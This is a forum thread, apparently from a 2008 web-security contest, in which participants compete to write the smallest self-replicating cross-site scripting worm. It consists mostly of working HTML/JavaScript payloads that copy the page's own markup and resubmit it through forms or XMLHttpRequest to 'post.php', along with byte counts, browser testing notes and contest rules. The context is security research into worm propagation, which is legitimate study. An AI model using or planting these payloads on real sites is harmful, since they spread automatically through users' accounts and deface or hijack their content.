Damn I'm blind, when optimizing the long form (image & XMLHttpRequest) with with() I saw I was using "new XMLHttpRequest" without (), and it had worked all along, but I hadn't used it on the other versions ...
Anyway, the shorter XMLHttpRequest vectors:

<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>

256 bytes - XMLHttpRequest, image

<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>

253 bytes - XMLHttpRequest, script


Another crazy note: after for the first time testing on Opera 9.5 beta (actually my 'main' browser for the moment), I noticed that the image code didn't worked (Opera actually needs some source to fire the onerror) I added a dot and saw that the quotes could be removed (still an innerHTML leftover), saving another 4 bytes! (from 260 to 256 bytes, coming close to the script code :-)
So after Opera testing I fired up Safari (3.0.4 beta for Windows), guess what, even that one passed both vectors like a charm, making it pass on all latest versions of the A-Grade browsers! :-D (BTW I guess FF1.5 and IE6 will work too)

<form id=_><input name='content'><script>with(_)alert('XSS',submit(_[0].value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',142)))</script>

sorry, if somebody else has submitted this, it all looks that same atm.

153 bytes

EDIT:
Please disregard my submission. Its the same as Shawn's example only it is constructed differently (Shawn's is shown below).

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/07/2008 05:23AM by digi7al64.

@sirdarckcat

Yes, I tried parentNode also, but for me it didn't work in FF so I dropped it. I wonder if there are more ways of cloning nodes quickly and without making the code bigger. One limitation is still duplicating the <form> instance.


@Kyran

I think you can shorten it with one byte by dropping the last semicolon, which isn't mandatory but advised in ECMAscript:

<script>
alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>

New one:

157 doctype insensitive:

<form id=_><input name='content'><script>x=document._;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

extra:

I also thought about making a ternary decision on the docytype:

<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

which makes it more robust, but yes larger.


.



Edited 5 time(s). Last edit at 01/07/2008 03:31AM by Ronald.

@Ronald: That way it'll work

<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
161 bytes

But anyway - very nice one!

Greetings,
.mario



Edited 4 time(s). Last edit at 01/07/2008 03:01AM by .mario.

how bout:

<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

It seems cross doctype on my tests!

edit: deleted previous, silly mistake without testing stuff.

<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>

if the above works on IE count it as my official entry :)
The slice is adjusted depending on the content

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/07/2008 05:39AM by Gareth Heyes.

@Ronald

Ternary operators don't need (), you can save 2 chars ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yeah the form names also don't need quotes, so that's an extra 4 bytes right there, so new_vector=(old-6) :)

another advantage of a worm using XMLHTTP is that it can be made with pure javascript.

i would say there are often more opportunities for injecting just javascript (script tags, event handlers, etc) than there is a possibility to inject arbitrary html codes + script.

Similar technique as my previous one but this time using body, also the payload is the entire page and since it resubmits the entire page again the worm should be identical.

<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"

OR

<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 01/07/2008 08:50AM by Gareth Heyes.

@Gareth - I think this breaks several of the rules.

3) must not grow in size after propagation (if your code starts off as n bytes, it must not grow to n+x). We will assume content will get rejected by post.php if it grows beyond n bytes.
6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script

- RSnake
Gotta love it. http://ha.ckers.org

Yeh, like one of my first worms. :) But it wasn't allowed because RSnake said it must be very small what it submits/replicates, think -> VARCHAR(255)

@Rsnake

The content is replaced so it should work on any site and the payload does not change so I'm thinking it should be valid. Plus the technique works on IE + Firefox.
IMO it's a bit harsh if it isn't accepted but hey you're the judge.

Does this one break the rules?:-
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Obviously ;) my test script says:

Length: 72
nerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.p</plaintext>

Though the solution is nice the problem is that the slice parameters depend on the victim's site markup. Plus it doesn't alert ;)

<b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>

171 BYTES

Anyway, it's been a long time since I made my last post on this board, but this contest really is a lot of fun. I've used the <img src= because it gives me easy DOM access. I got a solution with more obfuscated code, which is a bit bigger but uses some quite exotic HTML features :o)

Not tested in MSIE because I dont have this Browser, I'd appreciate if someone could try this. Firefox works, and therefore we're done with this ;)

cheers, beni

Nope - it's 179 Bytes. Firefox transforms the code like below - manage to reduce it by 23 characters and you're in the game *g*

<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>

Also you can get rid of several bytes if you use better nesting of the methods to avoid usage of ;.



Edited 1 time(s). Last edit at 01/07/2008 09:55AM by .mario.

Ok this should be valid and my final entry I've spent way too much time already:-

<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/07/2008 10:20AM by Gareth Heyes.

The source code of some worms may be different after they have been run depending on if the replication occured in IE or Firefox. They may still work in the user agent used for the first generation of replication, but what if the other user agent is used?

For example: suppose site X has a XSS vulnerability.
IE user visits my infected profile on the site. IE user's profile is then infected with the source code after IE replication.
If a Firefox user visits that IE user's profile, does the IE-replicated source code have to replicate in their Firefox browser? Or does it only have to replicate for other IE users? Or, what if it still works, but the length increases, after IE replication-->Firefox replication?

Hmmm - doesn't replicate correctly - content=null :-/

Although it's interesting - i didn't know that an onload handler in a second body tag fires if the first ships without it:

<html>
<body onload="alert(1)">
<div></div>
<body onload="alert(2)"></body>
<div></div>
</body>
</html>

alerts 1

<html>
<body>
<div></div>
<body onload="alert(2)"></body>
<div></div>
</body>
</html>

alerts 2



Greetings,
.mario



Edited 2 time(s). Last edit at 01/07/2008 10:45AM by .mario.

You can use <body onfocus> which also fires automatically, but is much less likely to be already defined. That's what I used for my worm.

@dbloom: not in FF2

sorry - had a mistyping. it works!



Edited 1 time(s). Last edit at 01/07/2008 10:50AM by .mario.

@Gareth Heyes - .mario is correct, yours won't work if there is already an event handler assigned to body. Also you are using forms[0] where I said you aren't supposed to have knowledge of the DOM. The reason for this is that there may be other forms on the page above it. It shouldn't break.

@dbloom - I'd be more likely to take onfocus, because, as you said, it's far less often used (actually I've never even seen it in the wild). But to answer your other question it should work perfectly after replicated in both browsers. Otherwise it's far less dangerous and only dangerous to the people who view the original strain with that worm code in it. It's effectively like not making it cross platform at all, since very few people are likely to visit the original page. The only way I could see your method working is if you were to somehow get them to go back to the original page and run the original code if they run across the second variant. So for the purposes of this contest, let's just say it's got to replicate the same in both browsers.

@rsnake

Yeah it isn't valid but it doesn't matter about document.forms because the vector removes all the content off the page anyway so there would be always one form.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Not aiming for a prize, just iframe fun:

<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">

*COUGH*

this *works* in Firefox...

<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">

Ronald this isn't just sending the worm code buddy.. try
<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>

mmm kay, better 1:

<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">

it may or may not need a closing form tag, but anyhow it works like this.

This works finally I think:-

<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Okay, wtf.

<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">

(146)

translates to this in FireFox

<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>

(157)

Okay, it's just closing the iframe, that's logic. But check out what IE(tab) does with this:

<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>

(173!!)

What the hell? </head>? And why is it opening <body>? Is this because of my iframe? Does this happen also in IE7?

Anyway, this is my official submission until I made something smaller.

EDIT: Yes, it has doctype issues, I am aware of that ;)



Edited 1 time(s). Last edit at 01/07/2008 12:05PM by Spyware.

OK BeNi let's kick it! :) one byte smaller: (129)

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

I'm amazed how small we can get each time...



Edited 1 time(s). Last edit at 01/07/2008 12:11PM by Ronald.